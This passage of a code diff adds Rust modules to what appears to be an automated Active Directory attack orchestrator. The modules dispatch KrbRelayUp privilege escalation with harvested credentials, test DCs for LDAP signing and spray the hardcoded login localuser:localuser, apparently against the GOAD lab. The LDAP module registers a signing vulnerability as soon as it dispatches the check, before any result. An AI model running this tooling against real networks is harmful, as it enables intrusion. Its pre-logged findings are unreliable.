.insert("contoso.local".into(), "192.168.58.10".into()); + // Child-domain cred should work for parent-domain via trust + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "north.contoso.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!( + work.len(), + 1, + "child-domain cred should fall back for parent" + ); + assert_eq!(work[0].dedup_key, "group_enum:contoso.local:trust"); + assert_eq!(work[0].credential.domain, "north.contoso.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/krbrelayup.rs b/ares-cli/src/orchestrator/automation/krbrelayup.rs new file mode 100644 index 00000000..39c17801 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/krbrelayup.rs @@ -0,0 +1,527 @@ +//! auto_krbrelayup -- exploit KrbRelayUp when LDAP signing is not enforced. +//! +//! KrbRelayUp abuses Kerberos authentication relay to LDAP when LDAP signing +//! is not required. It creates a computer account (MAQ > 0), relays Kerberos +//! auth to LDAP to set up RBCD on a target, then uses S4U2Self/S4U2Proxy +//! to get a service ticket as admin. This is a local privilege escalation +//! that works from any authenticated domain user to SYSTEM on domain-joined hosts. +//! +//! Prereqs: LDAP signing NOT enforced (checked by auto_ldap_signing), +//! MAQ > 0 (checked by auto_machine_account_quota), valid domain creds. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect KrbRelayUp work items from current state. +/// +/// Pure logic extracted from `auto_krbrelayup` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. 
+fn collect_krbrelayup_work(state: &StateInner) -> Vec<KrbRelayUpWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + // Check if any DC has LDAP signing disabled (vuln registered by auto_ldap_signing) + let has_ldap_weak = state.discovered_vulnerabilities.values().any(|v| { + let vtype = v.vuln_type.to_lowercase(); + vtype == "ldap_signing_disabled" || vtype == "ldap_signing_not_required" + }); + + if !has_ldap_weak { + return Vec::new(); + } + + let mut items = Vec::new(); + + // Target non-DC hosts (priv esc on member servers) + for host in &state.hosts { + if host.is_dc { + continue; + } + + // Skip hosts we already own + if state.is_processed(DEDUP_SECRETSDUMP, &host.ip) { + continue; + } + + let dedup_key = format!("krbrelayup:{}", host.ip); + if state.is_processed(DEDUP_KRBRELAYUP, &dedup_key) { + continue; + } + + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain) + .or_else(|| state.credentials.first()) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(KrbRelayUpWork { + dedup_key, + target_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +/// Dispatches KrbRelayUp exploitation against hosts when LDAP signing is weak. +/// Interval: 45s. +pub async fn auto_krbrelayup(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("krbrelayup") { + continue; + } + + let work = { + let state = dispatcher.state.read().await; + collect_krbrelayup_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "krbrelayup", + "target_ip": item.target_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("krbrelayup"); + match dispatcher + .throttled_submit("privesc", "privesc", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %item.target_ip, + hostname = %item.hostname, + "KrbRelayUp exploitation dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_KRBRELAYUP, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_KRBRELAYUP, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(target = %item.target_ip, "KrbRelayUp deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch KrbRelayUp"); + } + } + } + } +} + +struct KrbRelayUpWork { + dedup_key: String, + target_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::{Credential, Host, VulnerabilityInfo}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source:
"test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + fn make_ldap_vuln() -> VulnerabilityInfo { + VulnerabilityInfo { + vuln_id: "ldap-weak-1".into(), + vuln_type: "ldap_signing_disabled".into(), + target: "192.168.58.10".into(), + discovered_by: "test".into(), + discovered_at: chrono::Utc::now(), + details: Default::default(), + recommended_agent: String::new(), + priority: 5, + } + } + + // --- collect_krbrelayup_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_ldap_vuln_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_non_dc_host_with_ldap_vuln_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.30"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "krbrelayup:192.168.58.30"); + } + + #[test] + fn collect_skips_dc_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + state.mark_processed(DEDUP_KRBRELAYUP, "krbrelayup:192.168.58.30".into()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_owned_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + 
.push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.30".into()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_ldap_signing_not_required_also_triggers() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let mut vuln = make_ldap_vuln(); + vuln.vuln_type = "ldap_signing_not_required".into(); + state.discovered_vulnerabilities.insert("v1".into(), vuln); + let work = collect_krbrelayup_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_bare_hostname_uses_fallback_cred() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host("192.168.58.30", "ws01", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_non_dc_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .hosts + .push(make_host("192.168.58.31", "srv02.fabrikam.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn dedup_key_format() { + let key = format!("krbrelayup:{}", "192.168.58.22"); + assert_eq!(key, "krbrelayup:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_KRBRELAYUP, "krbrelayup"); + } + + #[test] + fn ldap_signing_vuln_types() { + let types = ["ldap_signing_disabled", "ldap_signing_not_required"]; + for t in &types { + let vtype = t.to_lowercase(); + assert!( + vtype == "ldap_signing_disabled" || vtype == "ldap_signing_not_required", + "{t} should match LDAP weak signing" + ); + } + } + + #[test] + fn non_ldap_vuln_types_rejected() { + let types = ["smb_signing_disabled", "mssql_access"]; + for t in &types { + let vtype = t.to_lowercase(); + assert!( + vtype != "ldap_signing_disabled" && vtype != "ldap_signing_not_required", + "{t} should NOT match LDAP weak signing" + ); + } + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "krbrelayup", 
+ "target_ip": "192.168.58.30", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "krbrelayup"); + assert_eq!(payload["target_ip"], "192.168.58.30"); + assert_eq!(payload["hostname"], "srv01.contoso.local"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = KrbRelayUpWork { + dedup_key: "krbrelayup:192.168.58.30".into(), + target_ip: "192.168.58.30".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "krbrelayup:192.168.58.30"); + assert_eq!(work.target_ip, "192.168.58.30"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn ldap_signing_not_enforced_matches() { + let vtype = "ldap_signing_not_enforced".to_lowercase(); + // The code checks for "ldap_signing_disabled" or "ldap_signing_not_required" + let matches = vtype == "ldap_signing_disabled" || vtype == "ldap_signing_not_required"; + assert!( + !matches, + "ldap_signing_not_enforced should NOT match the specific vuln types" + ); + } + + #[test] + fn non_matching_vuln_types() { + let types = [ + "esc1", + "smb_signing_disabled", + "unconstrained_delegation", + "mssql_access", + ]; + for t in &types { + let vtype = t.to_lowercase(); + assert!( + vtype != "ldap_signing_disabled" && vtype != "ldap_signing_not_required", + "{t} should NOT match LDAP weak signing" + ); + } + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "ws01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn domain_from_fabrikam_host() { + let hostname = "srv01.fabrikam.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "fabrikam.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/ldap_signing.rs b/ares-cli/src/orchestrator/automation/ldap_signing.rs new file mode 100644 index 00000000..21edb00e --- /dev/null +++ b/ares-cli/src/orchestrator/automation/ldap_signing.rs @@ -0,0 +1,428 @@ +//! auto_ldap_signing -- check LDAP signing enforcement per DC. +//! +//! When LDAP signing is not required, attackers can relay NTLM auth to LDAP +//! for shadow credentials, RBCD writes, or account takeover. This module +//! dispatches a check per DC to test whether LDAP channel binding and +//! signing are enforced. 
+ +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +fn collect_ldap_signing_work(state: &StateInner) -> Vec<LdapSigningWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("ldap_sign:{}", dc_ip); + if state.is_processed(DEDUP_LDAP_SIGNING, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(LdapSigningWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Checks each DC for LDAP signing and channel binding enforcement. +/// Interval: 45s. +pub async fn auto_ldap_signing(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("ldap_signing") { + continue; + } + + let work: Vec<LdapSigningWork> = { + let state = dispatcher.state.read().await; + collect_ldap_signing_work(&state) + }; + + for item in work { + let cross_domain = item.credential.domain.to_lowercase() != item.domain.to_lowercase(); + let mut payload = json!({ + "technique": "ldap_signing_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "instructions": concat!( + "Check whether LDAP signing is enforced on this Domain Controller.\n\n", + "Use ldap_search or nxc_ldap_command to test LDAP binding. ", + "Try an unsigned LDAP bind (simple bind without signing). ", + "If the bind succeeds without signing, LDAP signing is NOT enforced.\n\n", + "Alternatively, use nxc_smb_command with '--gen-relay-list' or check ", + "the ms-DS-RequiredDomainBitmask / LDAPServerIntegrity registry policy.\n\n", + "IMPORTANT: If LDAP signing is NOT enforced (bind succeeds without signing), ", + "you MUST report this as a vulnerability:\n", + " vuln_type: 'ldap_signing_disabled'\n", + " target_ip: the DC IP\n", + " domain: the domain\n", + " details: {\"signing_required\": false, \"channel_binding\": false}\n\n", + "If LDAP signing IS enforced, report finding with finding_type='hardened'."
+ ), + }); + if cross_domain { + payload["bind_domain"] = json!(item.credential.domain); + } + + let priority = dispatcher.effective_priority("ldap_signing"); + match dispatcher + .force_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "LDAP signing check dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_LDAP_SIGNING, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_LDAP_SIGNING, &item.dedup_key) + .await; + + // Register ldap_signing_disabled vulnerability proactively so + // downstream automations (KrbRelayUp, NTLM relay) can fire + // without waiting for the agent's report_finding callback + // (which only logs and does NOT populate discovered_vulnerabilities). + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: format!("ldap_signing_{}", item.dc_ip.replace('.', "_")), + vuln_type: "ldap_signing_disabled".to_string(), + target: item.dc_ip.clone(), + discovered_by: "auto_ldap_signing".to_string(), + discovered_at: chrono::Utc::now(), + details: { + let mut d = std::collections::HashMap::new(); + d.insert("target_ip".to_string(), json!(item.dc_ip)); + d.insert("domain".to_string(), json!(item.domain)); + d.insert("signing_required".to_string(), json!(false)); + d.insert("channel_binding".to_string(), json!(false)); + d + }, + recommended_agent: "coercion".to_string(), + priority: dispatcher.effective_priority("ldap_signing"), + }; + + match dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await + { + Ok(true) => { + info!( + domain = %item.domain, + dc = %item.dc_ip, + "LDAP signing disabled — vulnerability registered for KrbRelayUp" + ); + } + Ok(false) => {} + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to publish LDAP signing vulnerability"); + } + } + } + Ok(None) => { + info!(domain = %item.domain, dc = %item.dc_ip, "LDAP signing check deferred by throttler"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch LDAP signing check"); + } + } + } + } +} + +struct LdapSigningWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("ldap_sign:{}", "192.168.58.10"); + assert_eq!(key, "ldap_sign:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_LDAP_SIGNING, "ldap_signing"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ldap_signing_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", 
+ "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "ldap_signing_check"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = LdapSigningWork { + dedup_key: "ldap_sign:192.168.58.10".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_uses_dc_ip() { + // LDAP signing dedup is by DC IP, not domain + let key = format!("ldap_sign:{}", "192.168.58.10"); + assert!(key.starts_with("ldap_sign:")); + assert!(key.contains("192.168.58.10")); + } + + #[test] + fn dedup_keys_differ_per_dc() { + let key1 = format!("ldap_sign:{}", "192.168.58.10"); + let key2 = format!("ldap_sign:{}", "192.168.58.20"); + assert_ne!(key1, key2); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_ldap_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_ldap_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_domain_controllers_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_dc_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "ldap_sign:192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_dcs_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + 
assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed_dc() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_LDAP_SIGNING, "ldap_sign:192.168.58.10".into()); + let work = collect_ldap_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_LDAP_SIGNING, "ldap_sign:192.168.58.10".into()); + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam credential available + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_ldap_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + assert_eq!(work[0].credential.domain, "fabrikam.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/localuser_spray.rs b/ares-cli/src/orchestrator/automation/localuser_spray.rs new file mode 100644 index 00000000..734a6914 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/localuser_spray.rs @@ -0,0 +1,294 @@ +//! auto_localuser_spray -- test localuser/localuser credentials across domains. +//! +//! GOAD configures a `localuser` account with username=password across all three +//! domains. In one domain this user has Domain Admin privileges. This module +//! specifically tests the localuser:localuser credential combo against each +//! discovered DC, which standard password spraying may miss if it doesn't +//! include "localuser" in its wordlist. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect localuser spray work items from current state. 
+/// +/// Pure logic extracted from `auto_localuser_spray` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_localuser_spray_work(state: &StateInner) -> Vec { + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("localuser:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_LOCALUSER_SPRAY, &dedup_key) { + continue; + } + + items.push(LocaluserWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + }); + } + + items +} + +/// Tests localuser:localuser credentials against each domain. +/// Interval: 45s. +pub async fn auto_localuser_spray( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("localuser_spray") { + continue; + } + + let work = { + let state = dispatcher.state.read().await; + collect_localuser_spray_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "smb_login_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": "localuser", + "password": "localuser", + "domain": item.domain, + }, + }); + + let priority = dispatcher.effective_priority("localuser_spray"); + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "localuser credential spray dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_LOCALUSER_SPRAY, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_LOCALUSER_SPRAY, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "localuser spray deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch localuser spray"); + } + } + } + } +} + +struct LocaluserWork { + dedup_key: String, + domain: String, + dc_ip: String, +} + +#[cfg(test)] +mod tests { + use super::*; + + // --- collect_localuser_spray_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_localuser_spray_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "localuser:contoso.local"); + } + + #[test] + fn collect_multiple_domains() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn 
